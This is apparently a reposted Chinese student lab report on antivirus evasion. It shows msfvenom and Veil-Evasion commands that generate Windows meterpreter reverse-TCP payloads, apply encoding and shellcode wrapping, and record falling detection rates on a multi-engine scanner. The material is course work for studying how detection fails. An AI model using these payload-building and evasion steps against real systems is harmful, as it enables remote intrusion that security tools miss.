20145322《网络对抗技术》免杀原理与实践

摘要:
20145322“网络对抗技术”免杀原则和实践基础问题答案:杀软件如何检测恶意代码?通过改变恶意程序和其他信息的明显特征,实现了避免被杀毒软件杀死的技术。避免杀人的基本方法是什么?使用C语言调用Shellcode使用msfvenom pwindows/meter reter/reverse_tcpLHOST=192.168.118LPORT=5322 fc命令生成C语言Shellcode数组。使用此数组在Windows主机的vs平台上编写外壳代码,并使用msf在Kali下侦听。运行刚刚编译的可执行文件,并成功获取权限。使用我的QQ管家检查并杀死:非常好…不能杀死…去网站试试扫描结果:12%的杀死报告发现了病毒。
20145322《网络对抗技术》免杀原理与实践

基础问题回答

(1)杀软是如何检测出恶意代码的?

基于特征码的检测

再就是根据该代码是否有恶意行为来判别,若有恶意的行为,我们就认为该代码是恶意代码。

(2)免杀是做什么?

通过改变恶意程序的明显特征等信息已达到避免被杀毒软件查杀的技术。

(3)免杀的基本方法有哪些?

改变特征码

对恶意代码进行加壳,或用其他语言(如veil-evasion)或编译器进行再编译,利用shellcode进行编码。

实践总结与体会

通过这次实验,我掌握了非常简单的避免查杀的方法,虽然这只是基本的攻击手段,但也让我发现我的QQ管家也不是完全靠得住的。要想避免被攻击,还是得先了解如何生成攻击。

离实战还缺些什么技术或步骤?

例如在实战中如何在靶机上注入后门程序并运行等,因为本次实验室靶机主动接受我们发送的后门,所以应该再学习如何主动把后门注入到靶机里的技术。

四、实践过程记录

msfvenom直接生成meterpreter可执行文件

已知 Windows IP为:192.168.1.112 kali IP为:192.168.1.118

使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 PORT=5322 -f exe > test.exe命令生成meterpreter可执行文件test.exe

20145322《网络对抗技术》免杀原理与实践第1张

使用ncat将文件传输到windows主机之后,上http://www.virscan.org/这个网站检测一下有多少查毒软件可以将其查杀出来

20145322《网络对抗技术》免杀原理与实践第2张

扫描结果:53%的杀软(21/39)报告发现病毒

Msfvenom使用编码器生成meterpreter可执行文件

使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘x00’ LHOST=192.168.1.106 PORT=5322 -f exe > test1.exe命令生成编码过的可执行文件test1.exe,编码一次

20145322《网络对抗技术》免杀原理与实践第3张

使用ncat将文件传输到windows主机后,再检测:

20145322《网络对抗技术》免杀原理与实践第4张

扫描结果:56%的杀软(22/39)报告发现病毒

编码十次

20145322《网络对抗技术》免杀原理与实践第5张

使用ncat将文件传输到windows主机后检测:

20145322《网络对抗技术》免杀原理与实践第6张

扫描结果:56%的杀软(22/39)报告发现病毒

由此可得对于编码这种免杀方法一般的杀毒软件都是可以防住的。

使用Veil-Evasion生成可执行文件

在Kali中打开veil-evasion:直接在输入veil-evasion

然后在menu里面输入以下命令来生成可执行文件:

use python/meterpreter/rev_tcp

set LHOST 192.168.1.118

generate

5322test

1

20145322《网络对抗技术》免杀原理与实践第7张

检测如下:

20145322《网络对抗技术》免杀原理与实践第8张

扫描结果:25%的杀软(10/39)报告发现病毒,有些杀软已经开始靠不住了。

使用C语言调用Shellcode

使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118 LPORT=5322 -f c命令生成一个C语言shellcode数组

利用这个数组在Windows主机的vs平台下写shellcode

20145322《网络对抗技术》免杀原理与实践第9张

在Kali下使用msf监听,运行刚刚编译生成的可执行文件,成功获取权限。

20145322《网络对抗技术》免杀原理与实践第10张

用我的QQ管家查杀:

20145322《网络对抗技术》免杀原理与实践第11张

很好·····杀不出来····

去网站试试

20145322《网络对抗技术》免杀原理与实践第12张

扫描结果:12%的杀软(5/39)报告发现病毒。更少了···反正QQ管家是靠不住了···

免责声明:文章转载自《20145322《网络对抗技术》免杀原理与实践》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇(转)Arcgis for Js之鼠标经过显示对象名的实现Windows8 游戏开发教程一、Metro UI 和绘图下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

MSSQL无落地文件执行Rootkit-WarSQLKit

0x00 前言 在本文中,我们将处理一个很长时间以来一直待解决的问题:MSSQL Rootkit。到目前为止,针对MS-SQL所描述的大多数命令执行都是调用“xp_cmdshell”和“sp_OACreate”存储过程的。因此,如果在没有xp_cmdshell和sp_OACreate存储过程的MSSQL服务器上拥有“sa”帐户或任何具有“sysadmin”...

SVG技术入门:线条动画实现原理

相信大家都见到过这样神奇的技术:一副线条构成的画能自动画出自己。非常的酷。Jake Archibald是这种SVG技术的首创者,并且写了一篇非常好的文章来描述它是如何实现的。Brian Suda也在24 Ways网站上讨论过它。 Polygon使用它在一篇设计方面的文章里创造出了非常神奇的效果。Codrops也做出了一些非常漂亮的例子。 其实我没有什么好增...

李艳鹏:技术人如何修炼内功

李艳鹏:技术人如何修炼内功     前不久趣直播举办了一场技术人成长交流会。邀请了易宝支付产品中心首席架构师李艳鹏来分享。 以下是文字版:   有请李艳鹏老师!第一场分享是由艳鹏老师带来的,今天非常感谢大家来到现场。艳鹏老师这本《分布式服务架构原理设计与实战》的作者,之前是一个朋友介绍他来我们平台做了一次直播,然后他相应的在服务器方面造诣比较深,他在易宝现...

《网络对抗技术》Exp2 后门原理与实践

Exp2 后门原理与实践 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头...

Flume技术原理

转:https://www.e-learn.cn/content/qita/690288 Flume是开源日志系统。是一个分布式、可靠性和高可用的海量日志聚合系统,支持在系统中定制各类数据发送方,用于收集数据;同时,FLume提供对数据进行简单处理,并写到各种数据接收方(可定制)的能力。 Flume是流式日志采集工具,FLume提供对数据进行简单处理并且写...

薄膜晶体管液晶显示器显示原理与设计

薄膜晶体管液晶显示器显示原理与设计 1 液晶显示的基本概念 1.1 液晶简介 1.2 液晶的特性 1.2.1 电学各向异性 1.2.2 光学各向异性 1.2.3 力学特性 1.2.4 其他特性 1.电阻率 2.黏度系数 3.相转变温度 1.3 偏光片 1.3.1 偏光片的基本原理 1.3.2 偏光片的基本构成 1.PVA层 2.TAC层 3.PSA层 4....